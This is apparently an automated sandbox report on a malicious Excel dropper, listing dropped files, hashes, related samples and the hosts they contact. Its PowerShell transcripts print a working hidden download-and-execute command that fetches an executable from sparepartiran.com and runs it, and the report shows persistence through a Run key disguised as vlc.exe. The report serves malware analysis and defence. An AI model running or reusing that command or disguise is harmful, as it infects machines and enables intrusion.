                                                                                                                            • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.42.151.234, 52.109.76.68, 52.109.8.23, 52.109.12.24, 51.104.139.180, 52.155.217.156, 20.54.26.129, 8.248.119.254, 8.253.204.121, 8.248.113.254, 8.253.95.249, 67.26.83.254, 92.122.213.194, 92.122.213.247, 204.79.197.222, 93.184.220.29
                                                                                                                            • Excluded domains from analysis (whitelisted): fp.msedge.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, cs9.wac.phicdn.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, a-0019.a-msedge.net, ocsp.digicert.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, 1.perf.msedge.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            12:18:54API Interceptor381x Sleep call for process: splwow64.exe modified
                                                                                                                            12:18:59API Interceptor66x Sleep call for process: powershell.exe modified
                                                                                                                            12:19:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vlc "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"
                                                                                                                            12:19:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vlc "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            162.223.88.131x2hGv.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/2Q/0mrxdv.exe
                                                                                                                            5901777.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/2Q/5901777.pdf.exe
                                                                                                                            Hm0L8.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/2Q/Mvyfnzkjh1.exe
                                                                                                                            5080132.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/1Q/Lfswmnuywzkn9.exe
                                                                                                                            Ref 0047.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/2Q/Yvvtz1.exe
                                                                                                                            633307.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/2Q/Wzdgpx2.exe
                                                                                                                            SecuriteInfo.com.Exploit.Siggen3.1570.13842.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/2Q/Twvaedwzfyck1.exe
                                                                                                                            4640578.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/2Q/Bolgkwpzwqs8.exe
                                                                                                                            6021557.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/d1/8YAOuE8zfTpo1M9.exe
                                                                                                                            INQUIRY ON PRICE LIST.xlsmGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/d1/IT4l74TKgSA7p92.exe
                                                                                                                            ORDER-45103.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/d1/SDJ-0488.exe
                                                                                                                            yp7kw0211047.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/d1/411.exe
                                                                                                                            Debt Statement.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/s0/11056.jpg
                                                                                                                            SD-1061.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/s0/SD-1061.jpg
                                                                                                                            NEW ORDER.xlsGet hashmaliciousBrowse
                                                                                                                            • sparepartiran.com/js/s0/zz1ecco.jpg

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            sparepartiran.comx2hGv.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            5901777.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            Hm0L8.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            5080132.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            Ref 0047.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            633307.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            SecuriteInfo.com.Exploit.Siggen3.1570.13842.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            4640578.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            6021557.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            INQUIRY ON PRICE LIST.xlsmGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            ORDER-45103.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            yp7kw0211047.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            Debt Statement.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            SD-1061.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            NEW ORDER.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131

                                                                                                                            ASN

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            COLOUPUSx2hGv.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            5901777.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            Hm0L8.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            5080132.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            Ref 0047.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            633307.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            SecuriteInfo.com.Exploit.Siggen3.1570.13842.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            4640578.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            6021557.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            INQUIRY ON PRICE LIST.xlsmGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            ORDER-45103.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            yp7kw0211047.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            Debt Statement.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            SD-1061.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131
                                                                                                                            NEW ORDER.xlsGet hashmaliciousBrowse
                                                                                                                            • 162.223.88.131

                                                                                                                            JA3 Fingerprints

                                                                                                                            No context

                                                                                                                            Dropped Files

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            C:\Users\Public\raqfxwuo.exeSecuriteInfo.com.Trojan.MulDrop15.61980.13868.exeGet hashmaliciousBrowse
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSecuriteInfo.com.Trojan.MulDrop15.61980.13868.exeGet hashmaliciousBrowse

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Users\Public\raqfxwuo.exe
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):518656
                                                                                                                                Entropy (8bit):7.090523037661616
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:5gMuIpvMHWB2naHLmFGlZ09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxc:mICE2n+jZIFqy
                                                                                                                                MD5:0998148D355B1E7BAD7B44558AA4C125
                                                                                                                                SHA1:5D062CB98564C1F2BC821C0A3E81B228780F77F7
                                                                                                                                SHA-256:8EF317F2278FBE6A533E8F78B932698E986280D2F4A6716AAAAA4DC5692222A8
                                                                                                                                SHA-512:0F824BC00379FF7F0E48C9D9E9ADFF8D38A6424B07B9E81528156747A628603E85E986DCBC618BF739FA06CCECA6343519D24C80C2B397A7887CDCAC0A0F8F32
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: SecuriteInfo.com.Trojan.MulDrop15.61980.13868.exe, Detection: malicious, Browse
                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+._.....................*......^.... ........@.. .......................@............@.....................................K........&................... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc....&.......(..................@..@.reloc....... ......................@..B................@.......H........1..87......n....h..*s...........................................0..t........(....8B...8........E....?...........8:....(.... .....:....&8....*.(....8.....(.... .....:....&8.....(.... ....8.....0..@....... ........8........E..................../...............8....8.... ....8....s......8....8.... ....8..........(....r...p................(.......(..................(.......o....t....}.... ....(....9K...& ....8@...s...... ....(....9*...&8 .....(....8]... ...... ....8....*
                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\raqfxwuo.exe.log
                                                                                                                                Process:C:\Users\Public\raqfxwuo.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1391
                                                                                                                                Entropy (8bit):5.344111348947579
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4W:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzh
                                                                                                                                MD5:E87C60A24438CC611338EA5ACB433A0A
                                                                                                                                SHA1:E0C6A7D5CFE32BB2178E71DEE79971A51697B7DD
                                                                                                                                SHA-256:80DAB47D7A9E233A692D10ACAF5793E34911836D36DB2E11BB7C5D42DE39782A
                                                                                                                                SHA-512:3DBD6773153DC9D05558ED491A92C9B4B72D594263D7BD2D06BDDCF09BE55477D35041145219A5E9A46B38575E5B60DA91C6870B2CA29A83388695AD389B8EBF
                                                                                                                                Malicious:false
                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7693F8CE-927A-4BC0-84CE-1390C3757E21
                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):129952
                                                                                                                                Entropy (8bit):5.378323982880214
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:tcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:PmQ9DQW+zBX8u
                                                                                                                                MD5:DBBB5D4435B55364F3861E47130CA61D
                                                                                                                                SHA1:3F770864852721DF691A79A336E5C75DA2426B9C
                                                                                                                                SHA-256:E5032D7CDA400ED9E7328DE908199981C59F5CA4CE19F9F0CD0A3CFF0BFA0B11
                                                                                                                                SHA-512:6A567ABF465912D536E342D16988B6C1FB7EF3BC3F453F097085471E815D17F7D96CD33AD316B3A4B8A0520AAFED2EABE53787145CB655BC03E21D46FF546A2F
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-28T11:17:33">.. Build: 16.0.13518.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1192
                                                                                                                                Entropy (8bit):5.325275554903011
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:3aEPpQrLAo4KAxq42FCvKM5qRPsOoFe9tCKnKJJxrd:qEPerB4U/FCvpqR0vFe9tC4arJ
                                                                                                                                MD5:7163813E4083D57DC319083F517EC1C6
                                                                                                                                SHA1:24802FC1847B4DC7D05C223FA488DEBFB77EF4FE
                                                                                                                                SHA-256:31B3F6D676C369F9698295B6330327D803A42212B2D238C18375AA40561FEC30
                                                                                                                                SHA-512:1A43D44A755A9309DA52B63957185DBEBCE736939463FF28E8839F83FBEB7EFCF3BCAD2BB1F3857E89E73F0317BF35A591972C5A98923A70A355272351B678AE
                                                                                                                                Malicious:false
                                                                                                                                Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices<................):gK..G...$.1.q........System.ConfigurationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wcxoixg.csm.ps1
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:very short file (no magic)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:U:U
                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                Malicious:false
                                                                                                                                Preview: 1
                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqmtbajf.dna.psm1
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:very short file (no magic)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:U:U
                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                Malicious:false
                                                                                                                                Preview: 1
                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujnjzpbo.1nn.psm1
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:very short file (no magic)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:U:U
                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                Malicious:false
                                                                                                                                Preview: 1
                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuno0mok.5qf.ps1
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:very short file (no magic)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:U:U
                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                Malicious:false
                                                                                                                                Preview: 1
                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):22
                                                                                                                                Entropy (8bit):2.9808259362290785
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                Malicious:false
                                                                                                                                Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                                                                                                                Process:C:\Users\Public\raqfxwuo.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):518656
                                                                                                                                Entropy (8bit):7.090523037661616
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:5gMuIpvMHWB2naHLmFGlZ09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxc:mICE2n+jZIFqy
                                                                                                                                MD5:0998148D355B1E7BAD7B44558AA4C125
                                                                                                                                SHA1:5D062CB98564C1F2BC821C0A3E81B228780F77F7
                                                                                                                                SHA-256:8EF317F2278FBE6A533E8F78B932698E986280D2F4A6716AAAAA4DC5692222A8
                                                                                                                                SHA-512:0F824BC00379FF7F0E48C9D9E9ADFF8D38A6424B07B9E81528156747A628603E85E986DCBC618BF739FA06CCECA6343519D24C80C2B397A7887CDCAC0A0F8F32
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: SecuriteInfo.com.Trojan.MulDrop15.61980.13868.exe, Detection: malicious, Browse
                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+._.....................*......^.... ........@.. .......................@............@.....................................K........&................... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc....&.......(..................@..@.reloc....... ......................@..B................@.......H........1..87......n....h..*s...........................................0..t........(....8B...8........E....?...........8:....(.... .....:....&8....*.(....8.....(.... .....:....&8.....(.... ....8.....0..@....... ........8........E..................../...............8....8.... ....8....s......8....8.... ....8..........(....r...p................(.......(..................(.......o....t....}.... ....(....9K...& ....8@...s...... ....(....9*...&8 .....(....8]... ...... ....8....*
                                                                                                                                C:\Users\user\Documents\20201128\PowerShell_transcript.445817.3hbNPFfq.20201128121858.txt
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3948
                                                                                                                                Entropy (8bit):5.407424716852214
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:BZljtN9tKqDo1ZPziOXmZfjtN9tKqDo1ZNsOX2OXLEEzyOXLEEzyOXLEEzxZp:NOXaOX2OXcOXcOX/
                                                                                                                                MD5:A41540735ABE757E3221307A63882472
                                                                                                                                SHA1:C5013228DF7F4CE2D11079F3499A38DB8207A39A
                                                                                                                                SHA-256:BFB875CE79B251B8BF1124F1B3B7A869A3FF8871CD13CEB5C7F003204F84E820
                                                                                                                                SHA-512:7F784AC3608BF6297DB4DAEF9C0245A900042703951CF5C4CAF6F5B581D741F92E36D68B9D49CA5C74D42F6C39A9BA788599164957A2B06AED23483A968A9203
                                                                                                                                Malicious:false
                                                                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20201128121858..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath C:\Users\Public\raqfxwuo.exe}..Process ID: 3480..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201128121858..**********************..PS> & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath C:\Users\Public\raqfxwuo.ex
                                                                                                                                C:\Users\user\Documents\20201128\PowerShell_transcript.445817.FB9lPag7.20201128121858.txt
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1217
                                                                                                                                Entropy (8bit):5.274944989815617
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:BxSAYC7vBZSqx2DOXiRbWoMqDt4WXHjeTKKjX4CIym1ZJXZaMqDtPnxSAZJ:BZpvjtoOqioMedXqDYB1ZqMelZZJ
                                                                                                                                MD5:D375714EDFC338BC2225B15A16F8A4BF
                                                                                                                                SHA1:F53787DDE1C12B65CF626C965F19627F97BCE3E6
                                                                                                                                SHA-256:D1F3A5AC781B255EE16EC70DE67562DB57F264D9EA3DCDE89CCC49DF0BB9B117
                                                                                                                                SHA-512:AFFB18C6E15CCB8F49428CCCFB48E372A4EB2BBB9D750513EBDEC202E4309719DA51BD56B43F2E35DC15F74C3791FB094738E99ED3C6EC49A3E51EBB204A5E16
                                                                                                                                Malicious:false
                                                                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20201128121858..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath C:\Users\Public\raqfxwuo.exe}..Process ID: 5916..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201128121858..**********************..PS> & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath C:\Users\Public\raqfxwuo.ex

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dell, Last Saved By: Dell, Create Time/Date: Thu Nov 26 22:27:20 2020, Last Saved Time/Date: Thu Nov 26 22:27:20 2020, Security: 0
                                                                                                                                Entropy (8bit):7.8619627003853285
                                                                                                                                TrID:
                                                                                                                                • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                File name:TcLt4.xls
                                                                                                                                File size:208384
                                                                                                                                MD5:4bb3584cc8f750ab27bf51e2d154496b
                                                                                                                                SHA1:bda4832689dc06c315a3b7a810814527a74915d9
                                                                                                                                SHA256:8a0de87ccaf8efb28f84081e3b589d4bd60c2da182a970838bc1e2fed0037e3e
                                                                                                                                SHA512:97463680b1b50ed7527d3295c66f6f82bb64fc7cf74d3a03ee542dae9165d7148d7e152394c374012086235d586b9344576f0b1df5b49a9460d0fbe9138730c5
                                                                                                                                SSDEEP:6144:Jk3hOdsylKlgryzc4bNhZF+E+W2knU17K4g62FpqDIWPIVirJNl15bdVwHmGRl:v1+4v2FpqDAcrJN1bbwGGR
                                                                                                                                File Content Preview:........................>.......................................................b.......d......................................................................................................................................................................

                                                                                                                                File Icon

                                                                                                                                Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                Static OLE Info

                                                                                                                                General

                                                                                                                                Document Type:OLE
                                                                                                                                Number of OLE Files:1

                                                                                                                                OLE File "TcLt4.xls"

                                                                                                                                Indicators

                                                                                                                                Has Summary Info:True
                                                                                                                                Application Name:unknown
                                                                                                                                Encrypted Document:False
                                                                                                                                Contains Word Document Stream:False
                                                                                                                                Contains Workbook/Book Stream:True
                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                Contains Visio Document Stream:False
